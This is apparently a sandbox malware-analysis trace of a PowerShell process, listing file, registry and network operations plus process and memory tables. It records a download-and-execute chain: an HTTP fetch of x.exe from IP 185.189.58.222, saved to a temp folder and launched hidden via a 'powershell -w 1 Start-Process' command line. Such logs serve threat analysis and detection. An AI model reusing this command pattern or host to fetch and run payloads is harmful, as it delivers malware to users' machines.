File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SecureBoot, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbWitness, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\StartLayout, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Storage, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TLS, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\UEV, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\VpnClient, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Wdac, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes True 5
Fn
System Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
Fn
File Get Info filename = C:\WINDOWS\system32\wldp.dll, type = file_attributes True 1
Fn
System Get Info type = Hardware Information True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
File Create filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_type True 2
Fn
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 4096, size_out = 2435 True 1
Fn
Data
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 637, size_out = 0 True 1
Fn
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 4096, size_out = 0 True 1
Fn
System Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
Fn
File Get Info filename = C:\WINDOWS\system32\wldp.dll, type = file_attributes True 1
Fn
System Get Info type = Hardware Information True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes True 2
Fn
File Create filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_type True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes False 1
Fn
Environment Get Environment String name = PSMODULEPATH, result_out = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
File Get Info filename = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility, type = file_attributes False 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes False 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes True 1
System Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
File Get Info filename = C:\WINDOWS\system32\wldp.dll, type = file_attributes True 1
System Get Info type = Hardware Information True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE False 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes True 3
File Create filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
File Create filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type True 2
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 4096 True 7
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 1920 True 1
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 128, size_out = 0 True 1
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 0 True 1
System Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
File Get Info filename = C:\WINDOWS\system32\wldp.dll, type = file_attributes True 1
System Get Info type = Hardware Information True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE False 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes True 2
File Create filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Environment Get Environment String name = PSModuleAutoLoadingPreference False 1
File Open filename = STD_ERROR_HANDLE True 1
File Get Info filename = STD_ERROR_HANDLE, type = file_type True 1
Module Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = file_attributes True 2
File Create filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = file_type True 2
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = size, size_out = 0 True 1
File Read filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 4096 True 8
File Read filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 3215 True 1
File Read filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 0 True 1
Module Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 1
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes False 2
File Create filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, type = file_type True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework, value_name = LegacyWPADSupport, type = REG_NONE False 1
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC True 1
Environment Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_Disabled False 1
Environment Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_MinCount False 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Environment Get Environment String name = PinnableBufferCache_System.Net.Connection_Disabled False 1
Environment Get Environment String name = PinnableBufferCache_System.Net.Connection_MinCount False 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Socket Connect remote_address = 185.189.58.222, remote_port = 80 True 1
Socket Close type = SOCK_STREAM True 1
Socket Send flags = NO_FLAG_SET, size = 69, size_out = 69 True 1
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Inet Open Connection protocol = http, server_name = 185.189.58.222, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /x.exe True 1
Inet Send HTTP Request headers = host: 185.189.58.222, connection: Keep-Alive, url = 185.189.58.222/x.exe True 1
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1
Inet Read Response size = 4096, size_out = 4096 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 53984 True 1
Inet Read Response size = 65536, size_out = 53984 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 4096 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 53709 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Inet Read Response size = 65536, size_out = 2904 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 11616 True 1
Inet Read Response size = 65536, size_out = 11616 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 4096 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 10424 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Inet Read Response size = 65536, size_out = 2904 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 23232 True 1
Inet Read Response size = 65536, size_out = 23232 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 4096 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 22040 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 31944 True 1
Inet Read Response size = 65536, size_out = 31944 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 31944 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 8712 True 1
Inet Read Response size = 65536, size_out = 8712 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 8712 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 40656 True 1
Inet Read Response size = 65536, size_out = 40656 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 40656 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 34848 True 1
Inet Read Response size = 65536, size_out = 34848 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 34848 True 1
Socket Receive flags = NO_FLAG_SET, size = 46507, size_out = 1452 True 1
Inet Read Response size = 46507, size_out = 1452 True 1
Socket Receive flags = NO_FLAG_SET, size = 45055, size_out = 1452 True 1
Inet Read Response size = 45055, size_out = 1452 True 1
Socket Receive flags = NO_FLAG_SET, size = 43603, size_out = 11616 True 1
Inet Read Response size = 43603, size_out = 11616 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 4096 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 10424 True 1
Socket Receive flags = NO_FLAG_SET, size = 31987, size_out = 1452 True 1
Inet Read Response size = 31987, size_out = 1452 True 1
Socket Receive flags = NO_FLAG_SET, size = 30535, size_out = 30535 True 1
Inet Read Response size = 30535, size_out = 30535 True 1
Socket Close type = SOCK_STREAM True 1
Inet Close Session - True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 4096 True 1
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 27891 True 1
Environment Get Environment String name = PSModuleAutoLoadingPreference False 1
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps;;C:\Program Files\Microsoft Office\root\Client True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 2
File Get Info filename = C:\ProgramData\Oracle\Java\javapath, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32, type = file_attributes True 1
File Get Info filename = C:\WINDOWS, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\System32\Wbem, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, type = file_attributes True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 2
Environment Get Environment String name = MshEnableTrace False 1
Process Create process_name = "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe, os_pid = 0x5e0, show_window = SW_HIDE True 1
Thread 0xaa8
Category Operation Information Success Count Logfile
System Sleep duration = -1 (infinite) True 1
System Sleep duration = 10000 milliseconds (10.000 seconds) True 1
System Sleep duration = -1 (infinite) True 1
Process #4: powershell.exe
Information Value
ID #4
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe
Initial Working Directory C:\Users\FD1HVy\Documents\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:04:46
OS Process Information
Information Value
PID 0x5e0
Parent PID 0x11a0 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs 0x108C, 0x10A0, 0x10C8, 0x10E0, 0x1170, 0xD08, 0x938, 0x13F0, 0xACC, 0x1244, 0x734, 0xC5C, 0x11C4, 0x10D4, 0xC30, 0x12FC, 0x12F4, 0x11CC, 0xADC, 0x1198, 0xAB4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x00000052e7290000 0x52e7290000 0x52e730ffff Private Memory Readable, Writable True False False -
private_0x00000052e7310000 0x52e7310000 0x52e738ffff Private Memory Readable, Writable True False False -
private_0x00000052e7390000 0x52e7390000 0x52e73cffff Private Memory Readable, Writable True False False -
private_0x00000052e7400000 0x52e7400000 0x52e75fffff Private Memory Readable, Writable True False False -
private_0x00000052e7600000 0x52e7600000 0x52e767ffff Private Memory Readable, Writable True False False -
private_0x00000052e7680000 0x52e7680000 0x52e76fffff Private Memory Readable, Writable True False False -
private_0x00000052e7700000 0x52e7700000 0x52e777ffff Private Memory Readable, Writable True False False -
private_0x00000052e7780000 0x52e7780000 0x52e77fffff Private Memory Readable, Writable True False False -
private_0x00000052e7800000 0x52e7800000 0x52e787ffff Private Memory Readable, Writable True False False -
private_0x00000052e7880000 0x52e7880000 0x52e78fffff Private Memory Readable, Writable True False False -
private_0x00000052e7900000 0x52e7900000 0x52e797ffff Private Memory Readable, Writable True False False -
private_0x00000052e7980000 0x52e7980000 0x52e79fffff Private Memory Readable, Writable True False False -
private_0x00000052e7a00000 0x52e7a00000 0x52e7a7ffff Private Memory Readable, Writable True False False -
private_0x00000052e7a80000 0x52e7a80000 0x52e7afffff Private Memory Readable, Writable True False False -
private_0x00000052e7b00000 0x52e7b00000 0x52e7b7ffff Private Memory Readable, Writable True False False -
private_0x00000052e7b80000 0x52e7b80000 0x52e7bbffff Private Memory Readable, Writable True False False -
private_0x00000194c5350000 0x194c5350000 0x194c536ffff Private Memory Readable, Writable True False False -
pagefile_0x00000194c5350000 0x194c5350000 0x194c535ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000194c5360000 0x194c5360000 0x194c5366fff Private Memory Readable, Writable True False False -
pagefile_0x00000194c5370000 0x194c5370000 0x194c5387fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c5390000 0x194c5390000 0x194c5393fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c53a0000 0x194c53a0000 0x194c53a0fff Pagefile Backed Memory Readable True False False -
private_0x00000194c53b0000 0x194c53b0000 0x194c53b0fff Private Memory Readable, Writable True False False -
locale.nls 0x194c53c0000 0x194c5484fff Memory Mapped File Readable False False False -
private_0x00000194c5490000 0x194c5490000 0x194c5496fff Private Memory Readable, Writable True False False -
